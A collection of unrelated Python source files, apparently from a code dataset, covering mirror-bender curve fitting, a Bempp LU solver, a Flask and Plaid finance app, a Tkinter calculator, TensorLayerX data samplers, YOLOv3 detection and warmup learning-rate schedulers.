A = (M1 + M2) / 2
B = (M1 - M2) / L
C = Eh_3 * (2 * b0 + e * b0) / 24
D = Eh_3 * e * b0 / (12 * L)
H = (A * D + B * C) / D ** 2
CDLP = C + D * L / 2
CDLM = C - D * L / 2
F = (H / L) * ((CDLM * numpy.log(CDLM) - CDLP * numpy.log(CDLP)) / D + L)
G = (-H * ((CDLM * numpy.log(CDLM) + CDLP * numpy.log(CDLP))) + (B * L ** 2) / 4) / (2 * D)
CDY = C + D * Y
return H * ((CDY / D) * numpy.log(CDY) - Y) - (B * Y ** 2) / (2 * D) + F * Y + G
def bender_function_2m(Y, M1, e, ratio): return general_bender_function(Y, M1, e, ratio)
def bender_function_1m(Y, M1, e): return general_bender_function(Y, M1, e, 1.0)
if kind_of_bender == SINGLE_MOMENTUM:
bender_function = bender_function_1m
initial_guess = [self.M1, self.e]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1 * epsilon_minus),
self.e_min if self.e_fixed == False else (self.e * epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1 * epsilon_plus),
self.e_max if self.e_fixed == False else (self.e * epsilon_plus)]]
elif kind_of_bender == DOUBLE_MOMENTUM:
bender_function = bender_function_2m
initial_guess = [self.M1, self.e, self.ratio]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1*epsilon_minus),
self.e_min if self.e_fixed == False else (self.e*epsilon_minus),
self.ratio_min if self.ratio_fixed == False else (self.ratio*epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1*epsilon_plus),
self.e_max if self.e_fixed == False else (self.e*epsilon_plus),
self.ratio_max if self.ratio_fixed == False else (self.ratio*epsilon_plus)]]
elif shape == RECTANGLE:
def general_bender_function(Y, M1, ratio):
M2 = M1 * ratio
A = (M1 + M2) / 2
B = (M1 - M2) / L
C = Eh_3 * b0 / 12
F = (B * L**2) / (24 * C)
G = -(A * L**2) / (8 * C)
return -(B * Y**3) / (6 * C) + (A * Y**2) / (2 * C) + F * Y + G
def bender_function_2m(Y, M1, ratio): return general_bender_function(Y, M1, ratio)
def bender_function_1m(Y, M1): return general_bender_function(Y, M1, 1.0)
if kind_of_bender == SINGLE_MOMENTUM:
bender_function = bender_function_1m
initial_guess = [self.M1]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1 * epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1 * epsilon_plus)]]
elif kind_of_bender == DOUBLE_MOMENTUM:
bender_function = bender_function_2m
initial_guess = [self.M1, self.ratio]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1*epsilon_minus),
self.ratio_min if self.ratio_fixed == False else (self.ratio*epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1*epsilon_plus),
self.ratio_max if self.ratio_fixed == False else (self.ratio*epsilon_plus)]]
parameters, _ = curve_fit(f=bender_function,
xdata=y_fit,
ydata=ideal_profile_fit,
p0=initial_guess,
bounds=constraints,
method='trf')
if len(parameters) == 1: bender_profile = bender_function(y, parameters[0])
elif len(parameters) == 2: bender_profile = bender_function(y, parameters[0], parameters[1])
else: bender_profile = bender_function(y, parameters[0], parameters[1], parameters[2])
# rotate back to Shadow system
bender_profile = bender_profile[::-1]
ideal_profile = ideal_profile[::-1]
# from here it's Shadow Axis system
correction_profile = ideal_profile - bender_profile
if self.which_length == 1: correction_profile_fit = correction_profile[cursor]
# r-squared = 1 - residual sum of squares / total sum of squares
r_squared = 1 - (numpy.sum(correction_profile**2) / numpy.sum((ideal_profile - numpy.mean(ideal_profile))**2))
rms = round(correction_profile.std()*1e9*self.workspace_units_to_m, 6)
if self.which_length == 1: rms_opt = round(correction_profile_fit.std()*1e9*self.workspace_units_to_m, 6)
self.plot1D(y, bender_profile, y_values_2=ideal_profile, index=0, title = "Bender vs. Ideal Profiles" + "\n" + r'$R^2$ = ' + str(r_squared), um=1)
self.plot1D(y, correction_profile, index=1, title="Correction Profile 1D, r.m.s. = " + str(rms) + " nm" +
("" if self.which_length == 0 else (", " + str(rms_opt) + " nm (optimized)")))
z_bender_correction = numpy.zeros(z.shape)
for i in range(z_bender_correction.shape[0]): z_bender_correction[i, :] = numpy.copy(correction_profile)
return parameters, z_bender_correction
def plot1D(self, x_coords, y_values, y_values_2=None, index=0, title="", um=0):
if self.show_bender_plots == 1:
figure = self.figure_canvas[index].figure
axis = figure.gca()
axis.clear()
axis.set_xlabel("Y [" + self.workspace_units_label + "]")
axis.set_ylabel("Z [" + ("nm" if um==0 else "\u03bcm") + "]")
axis.set_title(title)
axis.plot(x_coords, (y_values * self.workspace_units_to_m * (1e9 if um==0 else 1e6)), color="blue", label="bender", linewidth=2)
if not y_values_2 is None: axis.plot(x_coords, (y_values_2 * self.workspace_units_to_m * (1e9 if um==0 else 1e6)), "-.r", label="ideal")
axis.legend(loc=0, fontsize='small')
figure.canvas.draw()
def plot3D(self, x_coords, y_coords, z_values, index, title=""):
if self.show_bender_plots == 1:
figure = self.figure_canvas[index].figure
x_to_plot, y_to_plot = numpy.meshgrid(x_coords, y_coords)
z_to_plot = z_values.T
axis = figure.gca()
axis.clear()
axis.set_xlabel("X [" + self.workspace_units_label + "]")
axis.set_ylabel("Y [" + self.workspace_units_label + "]")
axis.set_zlabel("Z [nm]")
axis.set_title(title)
axis.plot_surface(x_to_plot, y_to_plot, (z_to_plot * self.workspace_units_to_m * 1e9),
rstride=1, cstride=1, cmap=cm.autumn, linewidth=0.5, antialiased=True)
figure.canvas.draw()
axis.mouse_init()
if __name__ == "__main__":
a = QApplication(sys.argv)
ow = BendableEllipsoidMirror()
ow.show()
a.exec_()
ow.saveSettings()
| StarcoderdataPython |
3364631 | """Bempp direct solver interface."""
# pylint: disable=invalid-name
def compute_lu_factors(A):
"""
Precompute the LU factors of a dense operator A.
This function returns a tuple of LU factors of A.
This tuple can be used in the `lu_factor` attribute
of the lu function so that the LU decomposition is
not recomputed at each call to lu.
"""
from bempp.api import as_matrix
from scipy.linalg import lu_factor
return lu_factor(as_matrix(A.weak_form()))
def lu(A, b, lu_factor=None):
"""Simple direct solver interface.
This function takes an operator and a grid function,
converts the operator into a dense matrix and solves
the system via LU decomposition. The result is again
returned as a grid function.
Parameters
----------
A : bempp.api.BoundaryOperator
The left-hand side boundary operator
b : bempp.api.GridFunction
The right-hand side grid function
lu_decomp : tuple
Optionally pass the tuple (lu, piv)
obtained by the scipy method scipy.linalg.lu_factor
"""
from bempp.api import GridFunction
from scipy.linalg import solve, lu_solve
from bempp.api.assembly.blocked_operator import BlockedOperatorBase
from bempp.api.assembly.blocked_operator import projections_from_grid_functions_list
from bempp.api.assembly.blocked_operator import grid_function_list_from_coefficients
if isinstance(A, BlockedOperatorBase):
vec = projections_from_grid_functions_list(b, A.dual_to_range_spaces)
if lu_factor is not None:
sol = lu_solve(lu_factor, vec)
else:
mat = A.weak_form().A
sol = solve(mat, vec)
return grid_function_list_from_coefficients(sol, A.domain_spaces)
else:
vec = b.projections(A.dual_to_range)
if lu_factor is not None:
sol = lu_solve(lu_factor, vec)
else:
mat = A.weak_form().A
sol = solve(mat, vec)
return GridFunction(A.domain, coefficients=sol)
| StarcoderdataPython |
3265076 | import datetime
import logging
import os
import dateparser
import pandas as pd
import plaid
from flask import jsonify
from flask import render_template, request, flash
from config.files import files
from self_finance.back_end.data import Data
from self_finance.constants import BankSchema
from self_finance.constants import App
from self_finance.front_end import app
from self_finance.front_end.routes.state import State
from self_finance.front_end.routes.data import update_html_df
from self_finance.front_end.routes.insights import refresh_static_insights
from self_finance.front_end.routes.insights import refresh_dynamic_insights
logger = logging.getLogger(__name__)
class BankState(State):
PLAID_CLIENT_ID = os.environ[App.PLAID_CLIENT_ID_ENV_VAR_KEY]
PLAID_PUBLIC_KEY = os.environ[App.PLAID_PUBLIC_KEY_ENV_VAR_KEY]
PLAID_SECRET = os.environ[App.PLAID_SECRET_ENV_VAR_KEY]
PLAID_ENV = 'development'
PLAID_PRODUCTS = 'transactions'
client = plaid.Client(client_id=PLAID_CLIENT_ID, secret=PLAID_SECRET,
public_key=PLAID_PUBLIC_KEY, environment=PLAID_ENV)
access_token = None
def _standard_render():
return render_template(
'index.html',
plaid_public_key=BankState.PLAID_PUBLIC_KEY,
plaid_environment=BankState.PLAID_ENV,
plaid_products=BankState.PLAID_PRODUCTS
)
@app.route('/')
@app.route('/index')
def index():
return _standard_render()
@app.route('/index/update_transactions', methods=['POST'])
def get_access_token_and_update_transaction_history():
"""
obj: exchange token flow - exchange a Link public_token for an API access_token
"""
if BankState.access_token is None:
public_token = request.form['public_token']
try:
exchange_response = BankState.client.Item.public_token.exchange(public_token)
except plaid.errors.PlaidError as e:
flash(jsonify(format_error(e)), 'warning')
return _standard_render()
BankState.access_token = exchange_response['access_token']
else:
flash('Unable to obtain access token for data.', 'warning')
return _standard_render()
return update_transaction_history()
def update_transaction_history():
mrtd_org = Data.get_most_recent_transaction_date(BankSchema.BANK_TB_NAME, files['base_db'])
mrtd = BankSchema.DATE_FORMAT.format(dateparser.parse(mrtd_org).date()) if mrtd_org else BankSchema.DATE_FORMAT.format(
datetime.date.min)
# update on transactions only following the mrtd
start_date, end_date = mrtd, BankSchema.DATE_FORMAT.format(datetime.datetime.now())
full_df = get_transactions(start_date, end_date)
# TODO - this stuff isn't getting flashed
p1 = 'Successfully updated your bank to the latest transaction history.'
p2 = '\nNo previous data was found in your database so your entire transactions history was applied.'
p3 = f'\nFrom date {str(start_date)} to {str(end_date)}.'
p4 = f'No new transactions have been found.'
try:
if full_df is None or full_df.shape[0] == 0:
flash(p4, 'info')
return _standard_render()
logger.info(f'Merging transactions into {BankSchema.BANK_TB_NAME} database.')
Data.merge(full_df, files['base_db'])
if not mrtd_org:
flash(p1 + p2, 'info')
else:
flash(p1 + p3, 'info')
except Exception as e:
flash(e, 'warning')
# update data-state on /date end
if full_df is not None and full_df.shape[0] > 0:
# note: need to run from `as_html_form_from_sql` because of the
# additional preprocessing that is handled in merge operation
update_html_df()
refresh_static_insights()
refresh_dynamic_insights()
return _standard_render()
def get_transactions(start_date, end_date):
response = BankState.client.Transactions.get(BankState.access_token, start_date=start_date, end_date=end_date)
transactions = response['transactions']
# the transactions in the response are paginated, so make multiple calls while increasing the offset to
# retrieve all transactions
while len(transactions) < response['total_transactions']:
response = BankState.client.Transactions.get(BankState.access_token, start_date=start_date, end_date=end_date,
offset=len(transactions)
)
transactions.extend(response['transactions'])
return pd.DataFrame.from_dict(transactions)
def format_error(e):
return {'error': {'display_message': e.display_message, 'error_code': e.code, 'error_type': e.type,
'error_message': e.message}}
| StarcoderdataPython |
1782916 | <filename>calculator-with-gui/Libraries/NewWindow.py
import tkinter as tk # GUI Library
import os
from PIL import ImageTk # Allows for window icon
from PIL import Image # Allows for window icon
from .Menus import Menu # Program menu
from . import Entry # Calculation entry box
from . import Numbers # Number buttons
from . import Basic # Basic calculator config
# from . import Scientific # Scientific calculator config
class NewWindow(tk.Toplevel):
''' A new calculator GUI window '''
def __init__(self, parent):
tk.Toplevel.__init__(self, parent)
self.parent = parent
self.calculation = tk.StringVar()
self.calculation.trace("w", self.remove_alpha)
self.config_window()
self.add_widgets()
def config_window(self):
''' Set beginning window configurations '''
self.title("Calculator GUI with OOP")
self.geometry("500x300+300+300")
self.minsize(200, 200)
# Add program icon in top left corner
image_path = os.path.relpath(os.path.join("calculator-with-gui", "Libraries", "Assets", "calculator2.png"))
image = ImageTk.PhotoImage(Image.open(image_path))
self.iconphoto(False, image)
def add_widgets(self, symbols="Basic"):
''' Adds and places the widgets into the program window '''
# Add menu
self.option_add('*tearOff', tk.FALSE)
self.menu = Menu.Menubar(self)
self.config(menu=self.menu)
self.bind("<Control-n>", self.menu.filemenu.new_thread)
self.bind("<Control-q>", self.menu.filemenu.exit)
self.bind("<Control-c>", self.menu.editmenu.copy)
self.bind("<Control-x>", self.menu.editmenu.cut)
self.bind("<Control-v>", self.menu.editmenu.paste)
# Initialize and add entry box
self.entry = Entry.Entry(self)
self.entry.grid(column=0, row=0, columnspan=5, sticky="NSEW")
self.entry.height = self.entry.winfo_height()
self.entry.bind("<Configure>", self.entry.resize)
self.bind("<Return>", lambda key: self.handle_key(key.char))
self.bind("<BackSpace>", lambda key: self.handle_key(key.char))
self.bind("<Control-BackSpace>", self.entry.clear)
numbers = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "0"]
symbols = ["+", "-", "*", "/", "(", ")"]
keypad = ["Add", "Subtract", "Multiply", "Divide", "Equal", "Decimal"]
keypad.append("Enter")
chars = numbers + symbols
keypad_keys = numbers + keypad
for char in chars:
self.bind(char, lambda char: self.handle_key(char.char))
for key in keypad_keys:
self.bind("<Key-KP_" + key + ">", lambda key: self.handle_key(key.char))
self.bind("<Key>", lambda key: self.remove_alpha(key.char))
# Initialize and add number buttons
self.numbers = Numbers.Numbers(self)
self.numbers.grid(column=0, row=1, rowspan=4, columnspan=3)
self.numbers.grid_configure(sticky="NSEW")
self.numbers.bind("<Configure>", self.numbers.resize)
# Initialize and add basic symbols
self.symbols = Basic.Basic(self)
self.symbols.grid(column=3, row=1, rowspan=4, sticky="NSEW")
self.symbols.bind("<Configure>", self.symbols.resize)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=3)
self.columnconfigure(0, weight=2)
self.columnconfigure(3, weight=1)
def handle_key(self, key):
if key == "=" or key == "\r": # Enter key
self.entry.calculate()
elif str(self.focus_get()) != ".!entry.!entry":
if key == "\x08": # Backspace key
self.entry.delete()
elif key == "=" or key == "\r": # Enter key
self.entry.calculate()
else:
self.entry.insert(key)
else:
current = self.calculation.get() + key
if "".join(current.split(key)) == "".join("Error".split(key)):
self.calculation.set("")
self.entry.insert(key)
def remove_alpha(self, char):
if char.isalpha():
current = self.calculation.get()
self.calculation.set(current.replace(char, ""))
| StarcoderdataPython |
4838212 | <gh_stars>10-100
#! /usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
__all__ = [
'Sampler',
'BatchSampler',
'RandomSampler',
'SequentialSampler',
'WeightedRandomSampler',
'SubsetRandomSampler',
]
class Sampler(object):
"""Base class for all Samplers.
All subclasses should implement following methods:
:code:`__iter__`: providing a way to iterate over indices of dataset element
:code:`__len__`: the length of the returned iterators.
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import Sampler
>>> class MySampler(Sampler):
>>> def __init__(self, data):
>>> self.data = data
>>> def __iter__(self):
>>> return iter(range(len(self.data_source)))
>>> def __len__(self):
>>> return len(self.data)
"""
def __init__(self):
pass
def __iter__(self):
raise NotImplementedError
class BatchSampler(Sampler):
"""Wraps another sampler to yield a mini-batch of indices.
Parameters
----------
sampler : Sampler
Base sampler.
batch_size : int
Size of mini-batch
drop_last : bool
If ``True``, the sampler will drop the last batch if its size would be less than ``batch_size``
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import BatchSampler, SequentialSampler
>>> list(BatchSampler(SequentialSampler(range(10)), batch_size=3, drop_last=False))
>>> #[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> list(BatchSampler(SequentialSampler(range(10)), batch_size=3, drop_last=True))
>>> #[[0, 1, 2], [3, 4, 5], [6, 7, 8]]
"""
def __init__(self, sampler=None, batch_size=1, drop_last=False):
super(BatchSampler, self).__init__()
if not isinstance(batch_size, int) or batch_size <= 0:
raise ValueError("batch_size should be a positive integer value, but got {}.".format(type(batch_size)))
if not isinstance(drop_last, bool):
raise ValueError("drop_last should be a bool value, but got {}.".format(type(drop_last)))
self.sampler = sampler
self.batch_size = batch_size
self.drop_last = drop_last
def __iter__(self):
batch_idxs = []
for index in self.sampler:
batch_idxs.append(index)
if len(batch_idxs) == self.batch_size:
yield batch_idxs
batch_idxs = []
if len(batch_idxs) > 0 and not self.drop_last:
yield batch_idxs
def __len__(self):
num_samples = len(self.sampler)
if self.drop_last:
return num_samples // self.batch_size
else:
return (num_samples + self.batch_size - 1) // self.batch_size
class RandomSampler(Sampler):
"""Samples elements randomly. If without replacement, then sample from a shuffled dataset.
If with replacement, then user can specify`num_samples` to draw.
Parameters
-------------
data : Dataset
dataset to sample
replacement : bool
samples are drawn on-demand with replacement if ``True``, default=``False``
num_samples : int
number of samples to draw, default=`len(dataset)`. This argument is supposed to be specified only when `replacement` is ``True``.
generator : Generator
Generator used in sampling. Default is None.
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import RandomSampler, Dataset
>>> import numpy as np
>>> class mydataset(Dataset):
>>> def __init__(self):
>>> self.data = [np.random.random((224,224,3)) for i in range(100)]
>>> self.label = [np.random.randint(1, 10, (1,)) for i in range(100)]
>>> def __getitem__(self, item):
>>> x = self.data[item]
>>> y = self.label[item]
>>> return x, y
>>> def __len__(self):
>>> return len(self.data)
>>> sampler = RandomSampler(data = mydataset())
"""
def __init__(self, data, replacement=False, num_samples=None, generator=None):
super(RandomSampler, self).__init__()
self.data = data
self.replacement = replacement
self._num_samples = num_samples
self.generator = generator
if not isinstance(self.replacement, bool):
raise TypeError("replacement should be a boolean value, but got " "replacement={}".format(self.replacement))
if self._num_samples is not None and not replacement:
raise ValueError("When replacement is False, num_samples should not be specified.")
if not isinstance(self.num_samples, int) or self.num_samples <= 0:
raise ValueError(
"num_samples should be a positive integer, "
"but got num_samples={}".format(self.num_samples)
)
@property
def num_samples(self):
if self._num_samples is None:
return len(self.data)
return self._num_samples
def __iter__(self):
n = len(self.data)
if self.generator is None:
generator = np.random.default_rng()
if self.replacement:
for index in generator.choice(np.arange(n), self.num_samples, replace=True).tolist():
yield index
else:
for index in generator.choice(np.arange(n), n, replace=False).tolist():
yield index
else:
for i in range(self.num_samples):
try:
index = next(self.generator)
except StopIteration:
return
yield index
def __len__(self):
return self.num_samples
class SequentialSampler(Sampler):
"""Samples elements sequentially, always in the same order.
Parameters
----------
data : Dataset
dataset to sample
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import SequentialSampler, Dataset
>>> import numpy as np
>>> class mydataset(Dataset):
>>> def __init__(self):
>>> self.data = [np.random.random((224,224,3)) for i in range(100)]
>>> self.label = [np.random.randint(1, 10, (1,)) for i in range(100)]
>>> def __getitem__(self, item):
>>> x = self.data[item]
>>> y = self.label[item]
>>> return x, y
>>> def __len__(self):
>>> return len(self.data)
>>> sampler = SequentialSampler(data = mydataset())
"""
def __init__(self, data):
super(SequentialSampler, self).__init__()
self.data = data
def __iter__(self):
return iter(range(len(self.data)))
def __len__(self):
return len(self.data)
class WeightedRandomSampler(Sampler):
"""Samples elements from ``[0,..,len(weights)-1]`` with given probabilities (weights).
Parameters
-----------
weights : list or tuple
a sequence of weights, not necessary summing up to one
num_samples : int
number of samples to draw
replacement : bool
if ``True``, samples are drawn with replacement.
If not, they are drawn without replacement, which means that when a sample index is drawn for a row, it cannot be drawn again for that row.
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import WeightedRandomSampler, Dataset
>>> import numpy as np
>>> sampler = list(WeightedRandomSampler(weights=[0.2,0.3,0.4,0.5,4.0], num_samples=5, replacement=True))
>>> #[4, 4, 1, 4, 4]
>>> sampler = list(WeightedRandomSampler(weights=[0.2,0.3,0.4,0.5,0.6], num_samples=5, replacement=False))
>>> #[4, 1, 3, 0, 2]
"""
def __init__(self, weights, num_samples, replacement=True):
super(WeightedRandomSampler, self).__init__()
if not isinstance(weights, (list, tuple, np.ndarray)):
raise ValueError("weights should be a list, tuple or numpy.ndarray, but got {}.".format(type(weights)))
weights = np.asarray(weights, np.float)
assert len(weights.shape) == 1, "weights should be a 1-D array"
if np.any(weights < 0.0):
raise ValueError("weights should be positive value.")
if not np.sum(weights) > 0.0:
raise ValueError("The sum of weights should be a positive value.")
if not replacement:
if np.sum(weights > 0.0) < num_samples:
raise ValueError(
"when replacement is False, the number of positive values in weights should be greater than numsamples."
)
self.weights = weights / weights.sum()
self.num_samples = num_samples
self.replacement = replacement
def __iter__(self):
index = np.random.choice(len(self.weights), self.num_samples, self.replacement, self.weights)
return iter(index.tolist())
def __len__(self):
return self.num_samples
class SubsetRandomSampler(Sampler):
"""Samples elements randomly from a given list of indices, without replacement.
Parameters
----------
indices : list or tuple
sequence of indices
"""
def __init__(self, indices):
super(SubsetRandomSampler, self).__init__()
self.indices = indices
def __iter__(self):
return (self.indices[i] for i in np.random.permutation(len(self.indices)))
def __len__(self):
return len(self.indices)
| StarcoderdataPython |
3267423 | import cv2
import os
from matplotlib import pyplot as plt
from model import *
from utils import *
import os
import time
import logging
import argparse
import numpy as np
import random
from numpy import expand_dims
from keras.preprocessing.image import load_img, img_to_array
import tensorflow as tf
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--class_threshold', type=int, default=0.5)
parser.add_argument('--nms_iou_threshold', type=int, default=0.5)
parser.add_argument('--iou', type=float, default=0.01)
args = parser.parse_args()
model = make_yolov3_model()
# load the model weights
weight_reader = WeightReader('yolov3.weights')
# set the model weights into the model
weight_reader.load_weights(model)
# save the model to file
model.save('model.h5')
from keras.models import load_model
model = load_model('model.h5')
model.summary()
anchors = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]]
# define the expected input shape for the model
WIDTH, HEIGHT = 416, 416
# define the probability threshold for detected objects
class_threshold = args.class_threshold
images=os.listdir('assets/image_test')
for file in images:
if file.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
photo_filename ='images/' + file
# load picture with old dimensions
image, image_w, image_h = load_image_pixels(photo_filename, (WIDTH, HEIGHT))
# Predict image
yhat = model.predict(image)
#print(len(yhat))
# Create boxes
boxes = list()
for i in range(len(yhat)):
# decode the output of the network
boxes += decode_netout(yhat[i][0], anchors[i], class_threshold, HEIGHT, WIDTH)
# correct the sizes of the bounding boxes for the shape of the image
correct_yolo_boxes(boxes, image_h, image_w, HEIGHT, WIDTH)
# suppress non-maximal boxes
do_nms(boxes, args.nms_iou_threshold)
# define the labels (Filtered only the ones relevant for this task, which were used in pretraining the YOLOv3 model)
labels = ["person", "bicycle", "car", "motorbike", "aeroplane", "bus", "train", "truck","boat","traffic light", \
"fire hydrant","stop sign","parking meter","bench","bird","cat","dog","horse","sheep", \
"cow","elephant","bear","zebra","giraffe","backpack","umbrella","handbag","tie","suitcase", \
"frisbee","skis","snowboard","sports ball","kite",'baseball bat','baseball glove','skateboard','surfboard','tennis racket','bottle', \
'wine glass','cup','fork','knife','spoon','bowl','banana','apple','sandwich','orange','broccoli', \
'carrot','hot dog','pizza','donut','cake','chair','sofa','pottedplant','bed','diningtable', \
'toilet','tvmonitor','laptop','mouse','remote','keyboard','cell phone','microwave','oven','toaster','sink','refrigerator', \
'book',"clock","vase","scissors","teddy bear",'hair drier',"toothbrush"]
# get the details of the detected objects
v_boxes, v_labels, v_scores = get_boxes(boxes, labels, class_threshold)
# summarize what we found
for i in range(len(v_boxes)):
print(v_labels[i], v_scores[i])
# draw what we found
draw_boxes(photo_filename, v_boxes, v_labels, v_scores)
if __name__ == '__main__':
main() | StarcoderdataPython |
3349084 | <filename>python_developer_tools/cv/scheduler/warmup_lr_scheduler.py
# !/usr/bin/env python
# -- coding: utf-8 --
# @Author zengxiaohui
# Datatime:8/18/2021 9:19 AM
# @File:warmup_lr_scheduler.py
import math
import warnings
from functools import partial, wraps
from bisect import bisect_right
from torch.optim import Optimizer
from torch.optim.lr_scheduler import _LRScheduler, MultiStepLR, StepLR, ExponentialLR, CosineAnnealingLR
def AssemblyParams(f):
@wraps(f)
def info(*args, **kwargs):
name = kwargs['name'] # 下降方式
iters = kwargs['iters'] # 开始下降的位置
factor = kwargs['factor'] # 每次下降的大小
assert isinstance(name, str), 'name must be str type'
assert name, 'name must in ["linear","exponent","sine"]'
assert isinstance(iters, int), 'iters must be int type'
assert isinstance(factor, float), 'factor must be float type'
args[0].warmup_method = name
args[0].warmup_iters = iters
args[0].warmup_factor = factor
f(*args, **kwargs)
return info
class _WarmupLRScheduler(_LRScheduler):
# @AssemblyParams
def __init__(self, optimizer, last_epoch=-1, name=None,iters=None,factor=None):
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def step(self, epoch=None):
# Raise a warning if old pattern is detected
# https://github.com/pytorch/pytorch/issues/20124
if self._step_count == 1:
if not hasattr(self.optimizer.step, "_with_counter"):
warnings.warn("Seems like `optimizer.step()` has been overridden after learning rate scheduler "
"initialization. Please, make sure to call `optimizer.step()` before "
"`lr_scheduler.step()`. See more details at "
"https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
# Just check if there were two first lr_scheduler.step() calls before optimizer.step()
elif self.optimizer._step_count < 1:
warnings.warn("Detected call of `lr_scheduler.step()` before `optimizer.step()`. "
"In PyTorch 1.1.0 and later, you should call them in the opposite order: "
"`optimizer.step()` before `lr_scheduler.step()`. Failure to do this "
"will result in PyTorch skipping the first value of the learning rate schedule."
"See more details at "
"https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
self._step_count += 1
if epoch is None:
epoch = self.last_epoch + 1
self.last_epoch = epoch
for param_group, lr in zip(self.optimizer.param_groups, self.get_lr(self._step_count)):
param_group['lr'] = lr
def get_warmup_factor_at_iter(self, iter):
"""
Return the learning rate warmup factor at a specific iteration.
See :paper:`in1k1h` for more details.
Args:
method (str): warmup method; either "constant" or "linear".
iter (int): iteration at which to calculate the warmup factor.
warmup_iters (int): the number of warmup iterations.
Returns:
float: the effective warmup factor at the given iteration.
"""
if iter >= self.warmup_iters:
return 1.0
if self.warmup_method == "constant":
return self.warmup_factor
elif self.warmup_method == "linear":
return (iter + 1) / self.warmup_iters
elif self.warmup_method == "exponent":
return 1.0 - math.exp(-(iter + 1) / self.warmup_iters)
else:
return 1.0
class WarmupStepLR(_WarmupLRScheduler):
"""Sets the learning rate of each parameter group to the initial lr
decayed by gamma every step_size epochs. When last_epoch=-1, sets
initial lr as lr.
Args:
optimizer (Optimizer): Wrapped optimizer.
step_size (int): Period of learning rate decay.
gamma (float): Multiplicative factor of learning rate decay.
Default: 0.1.
last_epoch (int): The index of last epoch. Default: -1.
Example:
>>> # Assuming optimizer uses lr = 0.05 for all groups
>>> # lr = 0.05 if epoch < 30
>>> # lr = 0.005 if 30 <= epoch < 60
>>> # lr = 0.0005 if 60 <= epoch < 90
>>> # ...
>>> scheduler = StepLR(optimizer, step_size=30, gamma=0.1)
>>> for epoch in range(100):
>>> train(...)
>>> validate(...)
>>> scheduler.step()
"""
@AssemblyParams
def __init__(self, optimizer, step_size, gamma=0.1, last_epoch=-1, name=None,iters=None,factor=None):
self.step_size = step_size
self.gamma = gamma
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [warmup_factor * base_lr for base_lr in self.base_lrs]
return [base_lr * self.gamma ** (self.last_epoch // self.step_size)
for base_lr in self.base_lrs]
class WarmupMultiStepLR(_WarmupLRScheduler):
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones. When
last_epoch=-1, sets initial lr as lr.
Args:
optimizer (Optimizer): Wrapped optimizer.
milestones (list): List of epoch indices. Must be increasing.
gamma (float): Multiplicative factor of learning rate decay.
Default: 0.1.
last_epoch (int): The index of last epoch. Default: -1.
Example:
>>> # Assuming optimizer uses lr = 0.05 for all groups
>>> # lr = 0.05 if epoch < 30
>>> # lr = 0.005 if 30 <= epoch < 80
>>> # lr = 0.0005 if epoch >= 80
>>> scheduler = MultiStepLR(optimizer, milestones=[30,80], gamma=0.1)
>>> for epoch in range(100):
>>> train(...)
>>> validate(...)
>>> scheduler.step()
"""
@AssemblyParams
def __init__(self, optimizer, milestones, gamma=0.1, last_epoch=-1, name=None,iters=None,factor=None):
if not list(milestones) == sorted(milestones):
raise ValueError('Milestones should be a list of'
' increasing integers. Got {}', milestones)
self.milestones = milestones
self.gamma = gamma
super(WarmupMultiStepLR, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [warmup_factor * base_lr for base_lr in self.base_lrs]
return [base_lr * self.gamma ** bisect_right(self.milestones, self.last_epoch)
for base_lr in self.base_lrs]
class WarmupExponentialLR(_WarmupLRScheduler):
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma every epoch. When last_epoch=-1, sets initial lr as lr.
Args:
optimizer (Optimizer): Wrapped optimizer.
gamma (float): Multiplicative factor of learning rate decay.
last_epoch (int): The index of last epoch. Default: -1.
"""
@AssemblyParams
def __init__(self, optimizer, gamma, last_epoch=-1, name=None,iters=None,factor=None):
self.gamma = gamma
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [warmup_factor * base_lr for base_lr in self.base_lrs]
return [base_lr * self.gamma ** self.last_epoch
for base_lr in self.base_lrs]
class WarmupCosineAnnealingLR(_WarmupLRScheduler):
r"""Set the learning rate of each parameter group using a cosine annealing
schedule, where :math:`\eta_{max}` is set to the initial lr and
:math:`T_{cur}` is the number of epochs since the last restart in SGDR:
.. math::
\eta_t = \eta_{min} + \frac{1}{2}(\eta_{max} - \eta_{min})(1 +
\cos(\frac{T_{cur}}{T_{max}}\pi))
When last_epoch=-1, sets initial lr as lr.
It has been proposed in
`SGDR: Stochastic Gradient Descent with Warm Restarts`_. Note that this only
implements the cosine annealing part of SGDR, and not the restarts.
Args:
optimizer (Optimizer): Wrapped optimizer.
T_max (int): Maximum number of iterations.
eta_min (float): Minimum learning rate. Default: 0.
last_epoch (int): The index of last epoch. Default: -1.
.. _SGDR\: Stochastic Gradient Descent with Warm Restarts:
https://arxiv.org/abs/1608.03983
"""
